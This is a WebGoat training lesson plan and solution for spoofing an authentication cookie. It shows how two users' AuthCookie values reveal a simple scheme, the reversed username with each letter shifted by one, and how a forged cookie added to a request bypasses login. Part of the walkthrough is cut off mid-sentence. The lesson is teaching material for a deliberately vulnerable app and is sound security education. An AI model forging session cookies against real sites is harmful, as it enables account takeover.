Lesson
Plan Title: How to
Spoof an Authentication Cookie
Concept / Topic To Teach:
Many
applications will automatically log a user into their site if the right
authentication cookie is specified. Some times the cookie values can be
guessed if the algorithm for generating the cookie can be obtained. Some
times the cookies are left on the client machine and can be stolen by
exploiting another system vulnerability. Some times the cookies maybe
intercepted using Cross site scripting. This lesson tries to make the
student aware of authentication cookies and presents the student with a way to
defeat the cookie authentication method in this lesson.
General Goal(s):
The user
should be able to bypass the authentication check.
Solution:
Make sure
that you have "Show Cookies" enabled in WebGoat. And you need to disable the
feature "Inject know cookies into requests" in WebScarab otherwise WebScarab
will always inject your old cookie and not the new cookie.
Figure 1 Disable "Inject known cookies into
requests"
Figure 2 Logon with webgoat/webgoat
You can login
with webgoat/webgoat.
Figure 3 Logged on as webgoat
Hit
"Refresh". This refresh will show our AuthCookie. And you are now authenticated
using this cookie and not with parameters like above.
There is a
new cookie called AuthCookie with values 65432ubphcfx. Logout and login with
aspect/aspect.
Figure 4 Logon as aspect/aspect
Figure 5 Logged on as aspect
Hit "Refresh"
to see the new cookie.
Figure 6 Cookie for user aspect
You have now
a different cookie value for AuthCookie: 65432udfgfb
|
webgoat |
ubphcfx |
|
Aspect |
udfgfb |
This is an transposition
of the letters of the alphabet. Each letter is replaced with its successor, for
example t->u, a->b and the user name is reversed. So for user name
Login with
user name
Figure 7 Add AuthCookie to request
Figure 8 Lesson 11 Completed
